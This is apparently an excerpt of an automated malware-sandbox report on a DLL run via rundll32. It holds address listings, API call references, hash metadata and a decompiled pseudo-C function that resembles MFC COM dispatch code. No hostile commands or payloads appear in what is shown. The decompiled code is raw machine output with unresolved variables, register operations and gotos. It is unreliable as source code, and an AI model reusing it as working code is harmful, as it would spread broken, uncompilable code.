                                                                                                                                    0x00000000
                                                                                                                                    0x1001c9b8
                                                                                                                                    0x1001c9bb
                                                                                                                                    0x1001c9c0
                                                                                                                                    0x1001c9cd
                                                                                                                                    0x1001c9d1
                                                                                                                                    0x1001c9d7
                                                                                                                                    0x1001c9d7
                                                                                                                                    0x1001c9e0
                                                                                                                                    0x1001c9e5
                                                                                                                                    0x1001c9e9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1001c9e9
                                                                                                                                    0x1001c986
                                                                                                                                    0x1001c98d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1001c993
                                                                                                                                    0x1001c995
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1001c95b
                                                                                                                                    0x1001c963
                                                                                                                                    0x1001cb60
                                                                                                                                    0x1001cb65
                                                                                                                                    0x1001cb65

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                                      • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                                    • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                                    • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                                    • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                                    • _memset.LIBCMT ref: 1001CA70
                                                                                                                                    • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                                    • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                                    • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                                    • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                                    • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                                    • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                                    • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                                    • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                                    • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                    • API String ID: 867647115-4034971020
                                                                                                                                    • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                    • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                                    • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                    • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002DB49 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                    			E1002DB49(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				signed int _t194;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				signed int _t291;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E10030D27(E10044FCE, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E10030DFF(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10030030(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x100492f8;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 = _t194 - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if(_t194 == _t257) {
					L37:
					_t295 = 0;
					E1002BDD9(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10030030(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					_t289 = _t300 - 0x54;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1004b61c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1002DAF2(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10014517(_t257, _t289, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1002CDE9(_t300 - 0x68, _t289);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10014517(_t257, _t289, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1002E0D9))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E1002BC90(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E1001FCED(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E100144EC(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1002D549(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E1001FF59(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E1001FF59(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E1001FF59(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E10033135(_t300 + 0x14, 0x100505f8);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t291 = _t194 * _t290 >> 0x20;
					_t297 = E100144EC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10030030(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1002E08D))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E1002CA61(_t300 - 0x34, _t299, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E1002CE83(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10014517(_t258, _t291, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1002E03D))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E100200B9(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E100012C0(__ecx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E100201BD(__ecx);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

































                                                                                                                                    0x1002db49
                                                                                                                                    0x1002db50
                                                                                                                                    0x1002db55
                                                                                                                                    0x1002db58
                                                                                                                                    0x1002db5c
                                                                                                                                    0x1002e035
                                                                                                                                    0x1002e03a
                                                                                                                                    0x1002e03a
                                                                                                                                    0x1002db62
                                                                                                                                    0x1002db65
                                                                                                                                    0x1002db68
                                                                                                                                    0x1002db6b
                                                                                                                                    0x1002db75
                                                                                                                                    0x1002db78
                                                                                                                                    0x1002db7d
                                                                                                                                    0x1002db83
                                                                                                                                    0x1002db8e
                                                                                                                                    0x1002db8e
                                                                                                                                    0x1002db95
                                                                                                                                    0x1002db9c
                                                                                                                                    0x1002dba1
                                                                                                                                    0x1002dba8
                                                                                                                                    0x1002dba8
                                                                                                                                    0x1002dbab
                                                                                                                                    0x1002dbb2
                                                                                                                                    0x1002dbb5
                                                                                                                                    0x1002dbb8
                                                                                                                                    0x1002dbbb
                                                                                                                                    0x1002dbbe
                                                                                                                                    0x1002dbc1
                                                                                                                                    0x1002dbc5
                                                                                                                                    0x1002dbc9
                                                                                                                                    0x1002dbca
                                                                                                                                    0x1002ddea
                                                                                                                                    0x1002ddee
                                                                                                                                    0x1002ddf0
                                                                                                                                    0x1002ddf9
                                                                                                                                    0x1002ddfb
                                                                                                                                    0x1002ddfb
                                                                                                                                    0x1002de08
                                                                                                                                    0x1002de10
                                                                                                                                    0x1002de12
                                                                                                                                    0x1002de27
                                                                                                                                    0x1002de3e
                                                                                                                                    0x1002de41
                                                                                                                                    0x1002de46
                                                                                                                                    0x1002de4b
                                                                                                                                    0x1002de76
                                                                                                                                    0x1002de76
                                                                                                                                    0x1002de79
                                                                                                                                    0x1002de82
                                                                                                                                    0x1002de85
                                                                                                                                    0x1002df5a
                                                                                                                                    0x1002df5a
                                                                                                                                    0x1002df60
                                                                                                                                    0x1002e017
                                                                                                                                    0x1002e01a
                                                                                                                                    0x1002e01e
                                                                                                                                    0x1002e023
                                                                                                                                    0x1002e027
                                                                                                                                    0x1002e02a
                                                                                                                                    0x1002e02c
                                                                                                                                    0x1002e02f
                                                                                                                                    0x1002e034
                                                                                                                                    0x00000000
                                                                                                                                    0x1002e02a
                                                                                                                                    0x1002df6a
                                                                                                                                    0x1002df8f
                                                                                                                                    0x1002df92
                                                                                                                                    0x1002df95
                                                                                                                                    0x1002df98
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002df9a
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dfab
                                                                                                                                    0x1002dfb2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002e00f
                                                                                                                                    0x1002e012
                                                                                                                                    0x1002e015
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dfca
                                                                                                                                    0x1002dfcd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dfd4
                                                                                                                                    0x1002dfd7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dfb7
                                                                                                                                    0x1002dfba
                                                                                                                                    0x1002dfbd
                                                                                                                                    0x1002dfbf
                                                                                                                                    0x1002dfc2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dfe1
                                                                                                                                    0x1002dfe6
                                                                                                                                    0x1002dfe9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dff1
                                                                                                                                    0x1002dff4
                                                                                                                                    0x1002dff6
                                                                                                                                    0x1002dffa
                                                                                                                                    0x1002dffd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002e001
                                                                                                                                    0x1002e004
                                                                                                                                    0x1002e007
                                                                                                                                    0x1002e008
                                                                                                                                    0x1002e009
                                                                                                                                    0x1002e00a
                                                                                                                                    0x1002e00b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dfa7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002df9a
                                                                                                                                    0x1002df6e
                                                                                                                                    0x1002df73
                                                                                                                                    0x1002df79
                                                                                                                                    0x1002df7b
                                                                                                                                    0x1002df7d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002df83
                                                                                                                                    0x1002df89
                                                                                                                                    0x1002dea1
                                                                                                                                    0x1002dea1
                                                                                                                                    0x1002dea6
                                                                                                                                    0x1002dea6
                                                                                                                                    0x1002dea9
                                                                                                                                    0x1002deb2
                                                                                                                                    0x1002deb2
                                                                                                                                    0x1002deb7
                                                                                                                                    0x1002debd
                                                                                                                                    0x1002dec0
                                                                                                                                    0x1002dec2
                                                                                                                                    0x1002dec6
                                                                                                                                    0x1002dec8
                                                                                                                                    0x1002ded0
                                                                                                                                    0x1002ded1
                                                                                                                                    0x1002ded7
                                                                                                                                    0x1002ded7
                                                                                                                                    0x1002ded9
                                                                                                                                    0x1002dedf
                                                                                                                                    0x1002dee5
                                                                                                                                    0x1002deed
                                                                                                                                    0x1002def5
                                                                                                                                    0x1002def8
                                                                                                                                    0x1002def8
                                                                                                                                    0x1002df03
                                                                                                                                    0x1002df09
                                                                                                                                    0x1002df0b
                                                                                                                                    0x1002df12
                                                                                                                                    0x1002df17
                                                                                                                                    0x1002df1a
                                                                                                                                    0x1002df1a
                                                                                                                                    0x1002df22
                                                                                                                                    0x1002df24
                                                                                                                                    0x1002df2b
                                                                                                                                    0x1002df30
                                                                                                                                    0x1002df33
                                                                                                                                    0x1002df33
                                                                                                                                    0x1002df3b
                                                                                                                                    0x1002df40
                                                                                                                                    0x1002df46
                                                                                                                                    0x1002df52
                                                                                                                                    0x1002df55
                                                                                                                                    0x00000000
                                                                                                                                    0x1002df55
                                                                                                                                    0x1002de8f
                                                                                                                                    0x1002de95
                                                                                                                                    0x1002de9c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de9e
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de4d
                                                                                                                                    0x1002de50
                                                                                                                                    0x1002de56
                                                                                                                                    0x1002de71
                                                                                                                                    0x1002de71
                                                                                                                                    0x1002de74
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de5c
                                                                                                                                    0x1002de5e
                                                                                                                                    0x1002de60
                                                                                                                                    0x1002de66
                                                                                                                                    0x1002de67
                                                                                                                                    0x1002de6d
                                                                                                                                    0x1002de6d
                                                                                                                                    0x1002de70
                                                                                                                                    0x1002de70
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de70
                                                                                                                                    0x1002de62
                                                                                                                                    0x1002de64
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de64
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de71
                                                                                                                                    0x1002dbd0
                                                                                                                                    0x1002dbd4
                                                                                                                                    0x1002dbd5
                                                                                                                                    0x1002dbe4
                                                                                                                                    0x1002dbef
                                                                                                                                    0x1002dbf2
                                                                                                                                    0x1002dbfa
                                                                                                                                    0x1002dbfd
                                                                                                                                    0x1002dc00
                                                                                                                                    0x1002dc06
                                                                                                                                    0x1002dc06
                                                                                                                                    0x1002dc0a
                                                                                                                                    0x1002dc0d
                                                                                                                                    0x1002dc10
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dc16
                                                                                                                                    0x1002dc1b
                                                                                                                                    0x1002dc1e
                                                                                                                                    0x1002dc24
                                                                                                                                    0x1002dc27
                                                                                                                                    0x1002dc2a
                                                                                                                                    0x1002dc2d
                                                                                                                                    0x1002dc33
                                                                                                                                    0x1002dc36
                                                                                                                                    0x1002dc39
                                                                                                                                    0x1002dc43
                                                                                                                                    0x1002dc43
                                                                                                                                    0x1002dc46
                                                                                                                                    0x1002dc4e
                                                                                                                                    0x1002dc50
                                                                                                                                    0x1002dd6d
                                                                                                                                    0x1002dd72
                                                                                                                                    0x1002dd75
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dd77
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dd7e
                                                                                                                                    0x1002dd81
                                                                                                                                    0x1002dd83
                                                                                                                                    0x1002dd89
                                                                                                                                    0x1002dd93
                                                                                                                                    0x1002dd9a
                                                                                                                                    0x1002dd9c
                                                                                                                                    0x1002dda8
                                                                                                                                    0x1002ddac
                                                                                                                                    0x1002ddb1
                                                                                                                                    0x1002ddb5
                                                                                                                                    0x1002ddb9
                                                                                                                                    0x1002ddbb
                                                                                                                                    0x1002ddbe
                                                                                                                                    0x1002ddc3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dc56
                                                                                                                                    0x1002dc56
                                                                                                                                    0x1002ddc6
                                                                                                                                    0x1002ddc6
                                                                                                                                    0x1002ddc9
                                                                                                                                    0x1002ddc9
                                                                                                                                    0x1002ddcd
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ddcd
                                                                                                                                    0x1002dc5d
                                                                                                                                    0x1002dc61
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dc67
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dc7c
                                                                                                                                    0x1002dc7f
                                                                                                                                    0x1002dc81
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dca4
                                                                                                                                    0x1002dca8
                                                                                                                                    0x1002dcad
                                                                                                                                    0x1002dcb0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dcb7
                                                                                                                                    0x1002dcbb
                                                                                                                                    0x1002dcc0
                                                                                                                                    0x1002dcc3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dcca
                                                                                                                                    0x1002dccd
                                                                                                                                    0x1002dccf
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dcd3
                                                                                                                                    0x1002dcd6
                                                                                                                                    0x1002dcd8
                                                                                                                                    0x1002dcda
                                                                                                                                    0x1002dcdb
                                                                                                                                    0x1002dcde
                                                                                                                                    0x1002dce4
                                                                                                                                    0x1002dce8
                                                                                                                                    0x1002dcea
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dcf0
                                                                                                                                    0x1002dcf2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dd45
                                                                                                                                    0x1002dd48
                                                                                                                                    0x1002dd4c
